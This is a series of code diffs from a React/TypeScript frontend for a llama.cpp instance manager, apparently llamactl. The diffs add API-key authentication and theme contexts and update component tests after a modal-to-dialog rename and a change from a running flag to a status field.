-      expect(screen.getByTestId('modal-save-button')).toBeDisabled()
+      expect(screen.getByTestId('dialog-save-button')).toBeDisabled()

       // Clear and test valid name
       await user.clear(nameInput)
@@ -62,7 +69,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
       await waitFor(() => {
         expect(screen.queryByText(/can only contain letters, numbers, hyphens, and underscores/)).not.toBeInTheDocument()
-        expect(screen.getByTestId('modal-save-button')).not.toBeDisabled()
+        expect(screen.getByTestId('dialog-save-button')).not.toBeDisabled()
       })
     })
@@ -70,7 +77,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
       const user = userEvent.setup()

       render(
-        <InstanceModal
+        <InstanceDialog
           open={true}
           onOpenChange={mockOnOpenChange}
           onSave={mockOnSave}
@@ -81,16 +88,17 @@ describe('InstanceModal - Form Logic and Validation', () => {
       await user.type(screen.getByLabelText(/Instance Name/), 'my-instance')

       // Submit form
-      await user.click(screen.getByTestId('modal-save-button'))
+      await user.click(screen.getByTestId('dialog-save-button'))

       expect(mockOnSave).toHaveBeenCalledWith('my-instance', {
         auto_restart: true, // Default value
+        backend_type: BackendType.LLAMA_CPP
       })
     })

-    it('form resets when modal reopens', async () => {
+    it('form resets when dialog reopens', async () => {
       const { rerender } = render(
-        <InstanceModal
+        <InstanceDialog
           open={true}
           onOpenChange={mockOnOpenChange}
           onSave={mockOnSave}
@@ -101,18 +109,18 @@ describe('InstanceModal - Form Logic and Validation', () => {
       const nameInput = screen.getByLabelText(/Instance Name/)
       await userEvent.setup().type(nameInput, 'temp-name')

-      // Close modal
+      // Close dialog
       rerender(
-        <InstanceModal
+        <InstanceDialog
           open={false}
           onOpenChange={mockOnOpenChange}
           onSave={mockOnSave}
         />
       )

-      // Reopen modal
+      // Reopen dialog
       rerender(
-        <InstanceModal
+        <InstanceDialog
           open={true}
           onOpenChange={mockOnOpenChange}
           onSave={mockOnSave}
@@ -128,17 +136,17 @@ describe('InstanceModal - Form Logic and Validation', () => {
   describe('Edit Mode', () => {
     const mockInstance: Instance = {
       name: 'existing-instance',
-      running: false,
+      status: 'stopped',
       options: {
-        model: 'test-model.gguf',
-        gpu_layers: 10,
+        backend_type: BackendType.LLAMA_CPP,
+        backend_options: { model: 'test-model.gguf', gpu_layers: 10 },
         auto_restart: false
       }
     }

     it('pre-fills form with existing instance data', () => {
       render(
-        <InstanceModal
+        <InstanceDialog
           open={true}
           onOpenChange={mockOnOpenChange}
           onSave={mockOnSave}
@@ -159,7 +167,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
       const user = userEvent.setup()

       render(
-        <InstanceModal
+        <InstanceDialog
           open={true}
           onOpenChange={mockOnOpenChange}
           onSave={mockOnSave}
@@ -168,20 +176,20 @@ describe('InstanceModal - Form Logic and Validation', () => {
       )

       // Submit without changes
-      await user.click(screen.getByTestId('modal-save-button'))
+      await user.click(screen.getByTestId('dialog-save-button'))

       expect(mockOnSave).toHaveBeenCalledWith('existing-instance', {
-        model: 'test-model.gguf',
-        gpu_layers: 10,
+        backend_type: BackendType.LLAMA_CPP,
+        backend_options: { model: 'test-model.gguf', gpu_layers: 10 },
         auto_restart: false
       })
     })

     it('shows correct button text for running vs stopped instances', () => {
-      const runningInstance: Instance = { ...mockInstance, running: true }
+      const runningInstance: Instance = { ...mockInstance, status: 'running' }

       const { rerender } = render(
-        <InstanceModal
+        <InstanceDialog
           open={true}
           onOpenChange={mockOnOpenChange}
           onSave={mockOnSave}
@@ -189,10 +197,10 @@ describe('InstanceModal - Form Logic and Validation', () => {
         />
       )

-      expect(screen.getByTestId('modal-save-button')).toBeInTheDocument()
+      expect(screen.getByTestId('dialog-save-button')).toBeInTheDocument()

       rerender(
-        <InstanceModal
+        <InstanceDialog
           open={true}
           onOpenChange={mockOnOpenChange}
           onSave={mockOnSave}
@@ -207,7 +215,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
   describe('Auto Restart Configuration', () => {
     it('shows restart options when auto restart is enabled', () => {
       render(
-        <InstanceModal
+        <InstanceDialog
           open={true}
           onOpenChange={mockOnOpenChange}
           onSave={mockOnSave}
@@ -227,7 +235,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
       const user = userEvent.setup()

       render(
-        <InstanceModal
+        <InstanceDialog
           open={true}
           onOpenChange={mockOnOpenChange}
           onSave={mockOnSave}
@@ -247,7 +255,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
       const user = userEvent.setup()

       render(
-        <InstanceModal
+        <InstanceDialog
           open={true}
           onOpenChange={mockOnOpenChange}
           onSave={mockOnSave}
@@ -261,10 +269,11 @@ describe('InstanceModal - Form Logic and Validation', () => {
       await user.type(screen.getByLabelText(/Max Restarts/), '5')
       await user.type(screen.getByLabelText(/Restart Delay/), '10')

-      await user.click(screen.getByTestId('modal-save-button'))
+      await user.click(screen.getByTestId('dialog-save-button'))

       expect(mockOnSave).toHaveBeenCalledWith('test-instance', {
         auto_restart: true,
+        backend_type: BackendType.LLAMA_CPP,
         max_restarts: 5,
         restart_delay: 10
       })
@@ -276,7 +285,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
       const user = userEvent.setup()

       render(
-        <InstanceModal
+        <InstanceDialog
           open={true}
           onOpenChange={mockOnOpenChange}
           onSave={mockOnSave}
@@ -300,7 +309,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
       const user = userEvent.setup()

       render(
-        <InstanceModal
+        <InstanceDialog
           open={true}
           onOpenChange={mockOnOpenChange}
           onSave={mockOnSave}
@@ -310,11 +319,12 @@ describe('InstanceModal - Form Logic and Validation', () => {
       // Fill only required field
       await user.type(screen.getByLabelText(/Instance Name/), 'clean-instance')

-      await user.click(screen.getByTestId('modal-save-button'))
+      await user.click(screen.getByTestId('dialog-save-button'))

       // Should only include non-empty values
       expect(mockOnSave).toHaveBeenCalledWith('clean-instance', {
         auto_restart: true, // Only this default value should be included
+        backend_type: BackendType.LLAMA_CPP
       })
     })
@@ -322,7 +332,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
       const user = userEvent.setup()

       render(
-        <InstanceModal
+        <InstanceDialog
           open={true}
           onOpenChange={mockOnOpenChange}
           onSave={mockOnSave}
@@ -335,11 +345,12 @@ describe('InstanceModal - Form Logic and Validation', () => {
       const gpuLayersInput = screen.getByLabelText(/GPU Layers/)
       await user.type(gpuLayersInput, '15')

-      await user.click(screen.getByTestId('modal-save-button'))
+      await user.click(screen.getByTestId('dialog-save-button'))

       expect(mockOnSave).toHaveBeenCalledWith('numeric-test', {
         auto_restart: true,
-        gpu_layers: 15, // Should be number, not string
+        backend_type: BackendType.LLAMA_CPP,
+        backend_options: { gpu_layers: 15 }, // Should be number, not string
       })
     })
   })
@@ -349,14 +360,14 @@ describe('InstanceModal - Form Logic and Validation', () => {
       const user = userEvent.setup()

       render(
-        <InstanceModal
+        <InstanceDialog
           open={true}
           onOpenChange={mockOnOpenChange}
           onSave={mockOnSave}
         />
       )

-      await user.click(screen.getByTestId('modal-cancel-button'))
+      await user.click(screen.getByTestId('dialog-cancel-button'))

       expect(mockOnOpenChange).toHaveBeenCalledWith(false)
     })
@@ -365,7 +376,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
       const user = userEvent.setup()

       render(
-        <InstanceModal
+        <InstanceDialog
           open={true}
           onOpenChange={mockOnOpenChange}
           onSave={mockOnSave}
@@ -373,7 +384,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
       )

       await user.type(screen.getByLabelText(/Instance Name/), 'test')
-      await user.click(screen.getByTestId('modal-save-button'))
+      await user.click(screen.getByTestId('dialog-save-button'))

       expect(mockOnSave).toHaveBeenCalled()
       expect(mockOnOpenChange).toHaveBeenCalledWith(false)

View File

@@ -0,0 +1,162 @@
import { type ReactNode, createContext, useContext, useState, useEffect, useCallback } from 'react'
interface AuthContextState {
isAuthenticated: boolean
isLoading: boolean
apiKey: string | null
error: string | null
}
interface AuthContextActions {
login: (apiKey: string) => Promise<void>
logout: () => void
clearError: () => void
validateAuth: () => Promise<boolean>
}
type AuthContextType = AuthContextState & AuthContextActions
const AuthContext = createContext<AuthContextType | undefined>(undefined)
interface AuthProviderProps {
children: ReactNode
}
const AUTH_STORAGE_KEY = 'llamactl_management_key'
export const AuthProvider = ({ children }: AuthProviderProps) => {
const [isAuthenticated, setIsAuthenticated] = useState(false)
const [isLoading, setIsLoading] = useState(true)
const [apiKey, setApiKey] = useState<string | null>(null)
const [error, setError] = useState<string | null>(null)
// Load auth state from sessionStorage on mount
useEffect(() => {
const loadStoredAuth = async () => {
try {
const storedKey = sessionStorage.getItem(AUTH_STORAGE_KEY)
if (storedKey) {
setApiKey(storedKey)
// Validate the stored key
const isValid = await validateApiKey(storedKey)
if (isValid) {
setIsAuthenticated(true)
} else {
// Invalid key, remove it
sessionStorage.removeItem(AUTH_STORAGE_KEY)
setApiKey(null)
}
}
} catch (err) {
console.error('Error loading stored auth:', err)
// Clear potentially corrupted storage
sessionStorage.removeItem(AUTH_STORAGE_KEY)
} finally {
setIsLoading(false)
}
}
void loadStoredAuth()
}, [])
// Validate API key by making a test request
const validateApiKey = async (key: string): Promise<boolean> => {
try {
const response = await fetch('/api/v1/instances', {
headers: {
'Authorization': `Bearer ${key}`,
'Content-Type': 'application/json'
}
})
return response.ok
} catch (err) {
console.error('Auth validation error:', err)
return false
}
}
const login = useCallback(async (key: string) => {
setIsLoading(true)
setError(null)
try {
// Validate the provided API key
const isValid = await validateApiKey(key)
if (!isValid) {
throw new Error('Invalid API key')
}
// Store the key and update state
sessionStorage.setItem(AUTH_STORAGE_KEY, key)
setApiKey(key)
setIsAuthenticated(true)
} catch (err) {
const errorMessage = err instanceof Error ? err.message : 'Authentication failed'
setError(errorMessage)
throw new Error(errorMessage)
} finally {
setIsLoading(false)
}
}, [])
const logout = useCallback(() => {
sessionStorage.removeItem(AUTH_STORAGE_KEY)
setApiKey(null)
setIsAuthenticated(false)
setError(null)
}, [])
const clearError = useCallback(() => {
setError(null)
}, [])
const validateAuth = useCallback(async (): Promise<boolean> => {
if (!apiKey) return false
const isValid = await validateApiKey(apiKey)
if (!isValid) {
logout()
}
return isValid
}, [apiKey, logout])
const value: AuthContextType = {
isAuthenticated,
isLoading,
apiKey,
error,
login,
logout,
clearError,
validateAuth,
}
return (
<AuthContext.Provider value={value}>
{children}
</AuthContext.Provider>
)
}
export const useAuth = (): AuthContextType => {
const context = useContext(AuthContext)
if (context === undefined) {
throw new Error('useAuth must be used within an AuthProvider')
}
return context
}
// Helper hook for getting auth headers
export const useAuthHeaders = (): HeadersInit => {
const { apiKey, isAuthenticated } = useAuth()
if (!isAuthenticated || !apiKey) {
return {}
}
return {
'Authorization': `Bearer ${apiKey}`
}
}
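
A hypothetical consumer of the helper hook (not part of the diff): attaching the stored key to a one-off request, the same way the shared API client presumably does.

import { useAuthHeaders } from '@/contexts/AuthContext'

function useRawInstancesFetch() {
  const headers = useAuthHeaders()
  // Returns a function so the component decides when to fire the request.
  return () => fetch('/api/v1/instances', { headers })
}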

View File

@@ -1,7 +1,7 @@
-import type { ReactNode } from 'react';
-import { createContext, useContext, useState, useEffect, useCallback } from 'react'
+import { type ReactNode, createContext, useContext, useState, useEffect, useCallback } from 'react'
 import type { CreateInstanceOptions, Instance } from '@/types/instance'
 import { instancesApi } from '@/lib/api'
+import { useAuth } from '@/contexts/AuthContext'

 interface InstancesContextState {
   instances: Instance[]
@@ -29,6 +29,7 @@ interface InstancesProviderProps {
 }

 export const InstancesProvider = ({ children }: InstancesProviderProps) => {
+  const { isAuthenticated, isLoading: authLoading } = useAuth()
   const [instancesMap, setInstancesMap] = useState<Map<string, Instance>>(new Map())
   const [loading, setLoading] = useState(true)
   const [error, setError] = useState<string | null>(null)
@@ -41,6 +42,11 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
   }, [])

   const fetchInstances = useCallback(async () => {
+    if (!isAuthenticated) {
+      setLoading(false)
+      return
+    }
+
     try {
       setLoading(true)
       setError(null)
@@ -57,7 +63,7 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
     } finally {
       setLoading(false)
     }
-  }, [])
+  }, [isAuthenticated])

   const updateInstanceInMap = useCallback((name: string, updates: Partial<Instance>) => {
     setInstancesMap(prev => {
@@ -106,9 +112,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
     try {
       setError(null)
       await instancesApi.start(name)
-      // Update only this instance's running status
-      updateInstanceInMap(name, { running: true })
+      // Update only this instance's status
+      updateInstanceInMap(name, { status: "running" })
     } catch (err) {
       setError(err instanceof Error ? err.message : 'Failed to start instance')
     }
@@ -118,9 +124,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
     try {
       setError(null)
       await instancesApi.stop(name)
-      // Update only this instance's running status
-      updateInstanceInMap(name, { running: false })
+      // Update only this instance's status
+      updateInstanceInMap(name, { status: "stopped" })
     } catch (err) {
       setError(err instanceof Error ? err.message : 'Failed to stop instance')
     }
@@ -130,9 +136,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
     try {
       setError(null)
       await instancesApi.restart(name)
-      // Update only this instance's running status
-      updateInstanceInMap(name, { running: true })
+      // Update only this instance's status
+      updateInstanceInMap(name, { status: "running" })
     } catch (err) {
       setError(err instanceof Error ? err.message : 'Failed to restart instance')
     }
@@ -154,9 +160,19 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
     }
   }, [])

+  // Only fetch instances when auth is ready and user is authenticated
   useEffect(() => {
-    fetchInstances()
-  }, [fetchInstances])
+    if (!authLoading) {
+      if (isAuthenticated) {
+        void fetchInstances()
+      } else {
+        // Clear instances when not authenticated
+        setInstancesMap(new Map())
+        setLoading(false)
+        setError(null)
+      }
+    }
+  }, [authLoading, isAuthenticated, fetchInstances])

   const value: InstancesContextType = {
     instances,
View File

@@ -0,0 +1,54 @@
import { createContext, useContext, useEffect, useState, type ReactNode } from "react";
type Theme = "light" | "dark";
interface ThemeContextType {
theme: Theme;
toggleTheme: () => void;
}
const ThemeContext = createContext<ThemeContextType | undefined>(undefined);
interface ThemeProviderProps {
children: ReactNode;
}
export function ThemeProvider({ children }: ThemeProviderProps) {
const [theme, setTheme] = useState<Theme>(() => {
const stored = localStorage.getItem("theme");
if (stored === "light" || stored === "dark") {
return stored;
}
return window.matchMedia("(prefers-color-scheme: dark)").matches ? "dark" : "light";
});
useEffect(() => {
const root = document.documentElement;
if (theme === "dark") {
root.classList.add("dark");
} else {
root.classList.remove("dark");
}
localStorage.setItem("theme", theme);
}, [theme]);
const toggleTheme = () => {
setTheme(prevTheme => prevTheme === "light" ? "dark" : "light");
};
return (
<ThemeContext.Provider value={{ theme, toggleTheme }}>
{children}
</ThemeContext.Provider>
);
}
export function useTheme() {
const context = useContext(ThemeContext);
if (context === undefined) {
throw new Error("useTheme must be used within a ThemeProvider");
}
return context;
}
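
A minimal consumer sketch for the context above (component name, markup, and import path are assumptions):

import { useTheme } from '@/contexts/ThemeContext'

function ThemeToggle() {
  const { theme, toggleTheme } = useTheme()
  return (
    <button onClick={toggleTheme}>
      Switch to {theme === 'light' ? 'dark' : 'light'} mode
    </button>
  )
}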

View File

@@ -1,12 +1,14 @@
-import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
-import { render, screen, waitFor } from '@testing-library/react'
-import type { ReactNode } from 'react'
-import { InstancesProvider, useInstances } from '@/contexts/InstancesContext'
-import { instancesApi } from '@/lib/api'
-import type { Instance } from '@/types/instance'
+import { describe, it, expect, vi, beforeEach, afterEach } from "vitest";
+import { render, screen, waitFor } from "@testing-library/react";
+import type { ReactNode } from "react";
+import { InstancesProvider, useInstances } from "@/contexts/InstancesContext";
+import { instancesApi } from "@/lib/api";
+import type { Instance } from "@/types/instance";
+import { BackendType } from "@/types/instance";
+import { AuthProvider } from "../AuthContext";

 // Mock the API module
-vi.mock('@/lib/api', () => ({
+vi.mock("@/lib/api", () => ({
   instancesApi: {
     list: vi.fn(),
     create: vi.fn(),
@@ -15,8 +17,8 @@ vi.mock('@/lib/api', () => ({
     stop: vi.fn(),
     restart: vi.fn(),
     delete: vi.fn(),
-  }
-}))
+  },
+}));

 // Test component to access context
 function TestComponent() {
@@ -30,366 +32,391 @@ function TestComponent() {
     stopInstance,
     restartInstance,
     deleteInstance,
-    clearError
-  } = useInstances()
+    clearError,
+  } = useInstances();

   return (
     <div>
       <div data-testid="loading">{loading.toString()}</div>
-      <div data-testid="error">{error || 'no-error'}</div>
+      <div data-testid="error">{error || "no-error"}</div>
       <div data-testid="instances-count">{instances.length}</div>
-      {instances.map(instance => (
+      {instances.map((instance) => (
         <div key={instance.name} data-testid={`instance-${instance.name}`}>
-          {instance.name}:{instance.running.toString()}
+          {instance.name}:{instance.status}
         </div>
       ))}

       {/* Action buttons for testing with specific instances */}
       <button
-        onClick={() => createInstance('new-instance', { model: 'test.gguf' })}
+        onClick={() => createInstance("new-instance", { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "test.gguf" } })}
         data-testid="create-instance"
       >
         Create Instance
       </button>
       <button
-        onClick={() => updateInstance('instance1', { model: 'updated.gguf' })}
+        onClick={() => updateInstance("instance1", { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "updated.gguf" } })}
         data-testid="update-instance"
       >
         Update Instance
       </button>
       <button
-        onClick={() => startInstance('instance2')}
+        onClick={() => startInstance("instance2")}
         data-testid="start-instance"
       >
         Start Instance2
       </button>
       <button
-        onClick={() => stopInstance('instance1')}
+        onClick={() => stopInstance("instance1")}
         data-testid="stop-instance"
       >
         Stop Instance1
       </button>
       <button
-        onClick={() => restartInstance('instance1')}
+        onClick={() => restartInstance("instance1")}
         data-testid="restart-instance"
       >
         Restart Instance1
       </button>
       <button
-        onClick={() => deleteInstance('instance2')}
+        onClick={() => deleteInstance("instance2")}
         data-testid="delete-instance"
       >
         Delete Instance2
       </button>
-      <button
-        onClick={clearError}
-        data-testid="clear-error"
-      >
+      <button onClick={clearError} data-testid="clear-error">
         Clear Error
       </button>
     </div>
-  )
+  );
 }

 function renderWithProvider(children: ReactNode) {
   return render(
-    <InstancesProvider>
-      {children}
-    </InstancesProvider>
-  )
+    <AuthProvider>
+      <InstancesProvider>{children}</InstancesProvider>
+    </AuthProvider>
+  );
 }

-describe('InstancesContext', () => {
+describe("InstancesContext", () => {
   const mockInstances: Instance[] = [
-    { name: 'instance1', running: true, options: { model: 'model1.gguf' } },
-    { name: 'instance2', running: false, options: { model: 'model2.gguf' } }
-  ]
+    { name: "instance1", status: "running", options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "model1.gguf" } } },
+    { name: "instance2", status: "stopped", options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "model2.gguf" } } },
+  ];

   beforeEach(() => {
-    vi.clearAllMocks()
+    vi.clearAllMocks();
+    window.sessionStorage.setItem('llamactl_management_key', 'test-api-key-123');
+    global.fetch = vi.fn(() => Promise.resolve(new Response(null, { status: 200 })));

     // Default successful API responses
-    vi.mocked(instancesApi.list).mockResolvedValue(mockInstances)
-  })
+    vi.mocked(instancesApi.list).mockResolvedValue(mockInstances);
+  });

   afterEach(() => {
-    vi.clearAllMocks()
-  })
+    vi.restoreAllMocks();
+  });

-  describe('Initial Loading', () => {
-    it('loads instances on mount', async () => {
-      renderWithProvider(<TestComponent />)
+  describe("Initial Loading", () => {
+    it("loads instances on mount", async () => {
+      renderWithProvider(<TestComponent />);

       // Should start loading
-      expect(screen.getByTestId('loading')).toHaveTextContent('true')
+      expect(screen.getByTestId("loading")).toHaveTextContent("true");

       // Should fetch instances
       await waitFor(() => {
-        expect(instancesApi.list).toHaveBeenCalledOnce()
-      })
+        expect(instancesApi.list).toHaveBeenCalledOnce();
+      });

       // Should display loaded instances
       await waitFor(() => {
-        expect(screen.getByTestId('loading')).toHaveTextContent('false')
-        expect(screen.getByTestId('instances-count')).toHaveTextContent('2')
-        expect(screen.getByTestId('instance-instance1')).toHaveTextContent('instance1:true')
-        expect(screen.getByTestId('instance-instance2')).toHaveTextContent('instance2:false')
-      })
-    })
+        expect(screen.getByTestId("loading")).toHaveTextContent("false");
+        expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
+        expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
+          "instance1:running"
+        );
+        expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
+          "instance2:stopped"
+        );
+      });
+    });

-    it('handles API error during initial load', async () => {
-      const errorMessage = 'Network error'
-      vi.mocked(instancesApi.list).mockRejectedValue(new Error(errorMessage))
+    it("handles API error during initial load", async () => {
+      const errorMessage = "Network error";
+      vi.mocked(instancesApi.list).mockRejectedValue(new Error(errorMessage));

-      renderWithProvider(<TestComponent />)
+      renderWithProvider(<TestComponent />);
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('loading')).toHaveTextContent('false') expect(screen.getByTestId("loading")).toHaveTextContent("false");
expect(screen.getByTestId('error')).toHaveTextContent(errorMessage) expect(screen.getByTestId("error")).toHaveTextContent(errorMessage);
expect(screen.getByTestId('instances-count')).toHaveTextContent('0') expect(screen.getByTestId("instances-count")).toHaveTextContent("0");
}) });
}) });
}) });
describe('Create Instance', () => { describe("Create Instance", () => {
it('creates instance and adds it to state', async () => { it("creates instance and adds it to state", async () => {
const newInstance: Instance = { const newInstance: Instance = {
name: 'new-instance', name: "new-instance",
running: false, status: "stopped",
options: { model: 'test.gguf' } options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "test.gguf" } },
} };
vi.mocked(instancesApi.create).mockResolvedValue(newInstance) vi.mocked(instancesApi.create).mockResolvedValue(newInstance);
renderWithProvider(<TestComponent />) renderWithProvider(<TestComponent />);
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('loading')).toHaveTextContent('false') expect(screen.getByTestId("loading")).toHaveTextContent("false");
expect(screen.getByTestId('instances-count')).toHaveTextContent('2') expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
}) });
screen.getByTestId('create-instance').click() screen.getByTestId("create-instance").click();
await waitFor(() => { await waitFor(() => {
expect(instancesApi.create).toHaveBeenCalledWith('new-instance', { model: 'test.gguf' }) expect(instancesApi.create).toHaveBeenCalledWith("new-instance", {
}) backend_type: BackendType.LLAMA_CPP,
backend_options: { model: "test.gguf" }
});
});
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('instances-count')).toHaveTextContent('3') expect(screen.getByTestId("instances-count")).toHaveTextContent("3");
expect(screen.getByTestId('instance-new-instance')).toHaveTextContent('new-instance:false') expect(screen.getByTestId("instance-new-instance")).toHaveTextContent(
}) "new-instance:stopped"
}) );
});
});
it('handles create instance error without changing state', async () => { it("handles create instance error without changing state", async () => {
const errorMessage = 'Instance already exists' const errorMessage = "Instance already exists";
vi.mocked(instancesApi.create).mockRejectedValue(new Error(errorMessage)) vi.mocked(instancesApi.create).mockRejectedValue(new Error(errorMessage));
renderWithProvider(<TestComponent />) renderWithProvider(<TestComponent />);
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('loading')).toHaveTextContent('false') expect(screen.getByTestId("loading")).toHaveTextContent("false");
expect(screen.getByTestId('instances-count')).toHaveTextContent('2') expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
}) });
screen.getByTestId('create-instance').click() screen.getByTestId("create-instance").click();
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('error')).toHaveTextContent(errorMessage) expect(screen.getByTestId("error")).toHaveTextContent(errorMessage);
}) });
expect(screen.getByTestId('instances-count')).toHaveTextContent('2') expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
expect(screen.queryByTestId('instance-new-instance')).not.toBeInTheDocument() expect(
}) screen.queryByTestId("instance-new-instance")
}) ).not.toBeInTheDocument();
});
});
describe('Update Instance', () => { describe("Update Instance", () => {
it('updates instance and maintains it in state', async () => { it("updates instance and maintains it in state", async () => {
const updatedInstance: Instance = { const updatedInstance: Instance = {
name: 'instance1', name: "instance1",
running: true, status: "running",
options: { model: 'updated.gguf' } options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "updated.gguf" } },
} };
vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance) vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance);
renderWithProvider(<TestComponent />) renderWithProvider(<TestComponent />);
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('loading')).toHaveTextContent('false') expect(screen.getByTestId("loading")).toHaveTextContent("false");
expect(screen.getByTestId('instances-count')).toHaveTextContent('2') expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
}) });
screen.getByTestId('update-instance').click() screen.getByTestId("update-instance").click();
await waitFor(() => { await waitFor(() => {
expect(instancesApi.update).toHaveBeenCalledWith('instance1', { model: 'updated.gguf' }) expect(instancesApi.update).toHaveBeenCalledWith("instance1", {
}) backend_type: BackendType.LLAMA_CPP,
backend_options: { model: "updated.gguf" }
});
});
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('instances-count')).toHaveTextContent('2') expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
expect(screen.getByTestId('instance-instance1')).toBeInTheDocument() expect(screen.getByTestId("instance-instance1")).toBeInTheDocument();
}) });
}) });
}) });
describe('Start/Stop Instance', () => { describe("Start/Stop Instance", () => {
it('starts existing instance and updates its running state', async () => { it("starts existing instance and updates its running state", async () => {
vi.mocked(instancesApi.start).mockResolvedValue({} as Instance) vi.mocked(instancesApi.start).mockResolvedValue({} as Instance);
renderWithProvider(<TestComponent />) renderWithProvider(<TestComponent />);
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('loading')).toHaveTextContent('false') expect(screen.getByTestId("loading")).toHaveTextContent("false");
// instance2 starts as not running // instance2 starts as not running
expect(screen.getByTestId('instance-instance2')).toHaveTextContent('instance2:false') expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
}) "instance2:stopped"
);
});
// Start instance2 (button already configured to start instance2) // Start instance2 (button already configured to start instance2)
screen.getByTestId('start-instance').click() screen.getByTestId("start-instance").click();
await waitFor(() => { await waitFor(() => {
expect(instancesApi.start).toHaveBeenCalledWith('instance2') expect(instancesApi.start).toHaveBeenCalledWith("instance2");
// The running state should be updated to true // The running state should be updated to true
expect(screen.getByTestId('instance-instance2')).toHaveTextContent('instance2:true') expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
}) "instance2:running"
}) );
});
});
it('stops instance and updates running state to false', async () => { it("stops instance and updates running state to false", async () => {
vi.mocked(instancesApi.stop).mockResolvedValue({} as Instance) vi.mocked(instancesApi.stop).mockResolvedValue({} as Instance);
renderWithProvider(<TestComponent />) renderWithProvider(<TestComponent />);
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('loading')).toHaveTextContent('false') expect(screen.getByTestId("loading")).toHaveTextContent("false");
// instance1 starts as running // instance1 starts as running
expect(screen.getByTestId('instance-instance1')).toHaveTextContent('instance1:true') expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
}) "instance1:running"
);
});
// Stop instance1 (button already configured to stop instance1) // Stop instance1 (button already configured to stop instance1)
screen.getByTestId('stop-instance').click() screen.getByTestId("stop-instance").click();
await waitFor(() => { await waitFor(() => {
expect(instancesApi.stop).toHaveBeenCalledWith('instance1') expect(instancesApi.stop).toHaveBeenCalledWith("instance1");
// The running state should be updated to false // The running state should be updated to false
expect(screen.getByTestId('instance-instance1')).toHaveTextContent('instance1:false') expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
}) "instance1:stopped"
}) );
});
});
it('handles start instance error', async () => { it("handles start instance error", async () => {
const errorMessage = 'Failed to start instance' const errorMessage = "Failed to start instance";
vi.mocked(instancesApi.start).mockRejectedValue(new Error(errorMessage)) vi.mocked(instancesApi.start).mockRejectedValue(new Error(errorMessage));
renderWithProvider(<TestComponent />) renderWithProvider(<TestComponent />);
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('loading')).toHaveTextContent('false') expect(screen.getByTestId("loading")).toHaveTextContent("false");
}) });
screen.getByTestId('start-instance').click() screen.getByTestId("start-instance").click();
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('error')).toHaveTextContent(errorMessage) expect(screen.getByTestId("error")).toHaveTextContent(errorMessage);
}) });
}) });
}) });
describe('Delete Instance', () => { describe("Delete Instance", () => {
it('deletes instance and removes it from state', async () => { it("deletes instance and removes it from state", async () => {
vi.mocked(instancesApi.delete).mockResolvedValue(undefined) vi.mocked(instancesApi.delete).mockResolvedValue(undefined);
renderWithProvider(<TestComponent />) renderWithProvider(<TestComponent />);
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('loading')).toHaveTextContent('false') expect(screen.getByTestId("loading")).toHaveTextContent("false");
expect(screen.getByTestId('instances-count')).toHaveTextContent('2') expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
expect(screen.getByTestId('instance-instance2')).toBeInTheDocument() expect(screen.getByTestId("instance-instance2")).toBeInTheDocument();
}) });
screen.getByTestId('delete-instance').click() screen.getByTestId("delete-instance").click();
await waitFor(() => { await waitFor(() => {
expect(instancesApi.delete).toHaveBeenCalledWith('instance2') expect(instancesApi.delete).toHaveBeenCalledWith("instance2");
}) });
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('instances-count')).toHaveTextContent('1') expect(screen.getByTestId("instances-count")).toHaveTextContent("1");
expect(screen.queryByTestId('instance-instance2')).not.toBeInTheDocument() expect(
expect(screen.getByTestId('instance-instance1')).toBeInTheDocument() // instance1 should still exist screen.queryByTestId("instance-instance2")
}) ).not.toBeInTheDocument();
}) expect(screen.getByTestId("instance-instance1")).toBeInTheDocument(); // instance1 should still exist
});
});
it('handles delete instance error without changing state', async () => { it("handles delete instance error without changing state", async () => {
const errorMessage = 'Instance is running' const errorMessage = "Instance is running";
